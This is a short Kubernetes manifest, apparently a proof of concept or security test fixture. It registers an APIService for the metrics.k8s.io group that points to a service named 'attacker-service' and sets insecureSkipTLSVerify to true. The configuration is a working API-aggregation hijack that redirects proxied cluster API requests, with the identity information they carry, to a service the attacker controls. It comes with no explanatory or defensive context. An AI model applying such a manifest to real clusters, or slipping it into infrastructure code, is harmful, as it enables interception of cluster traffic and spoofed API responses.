apiVersion: apiregistration.k8s.io/v1
kind: APIService
metadata:
  name: v2beta1.metrics.k8s.io
spec:
  group: metrics.k8s.io
  version: v2beta1
  insecureSkipTLSVerify: true
  groupPriorityMinimum: 100
  versionPriority: 100
  service:
    namespace: default
    name: attacker-service
    port: 443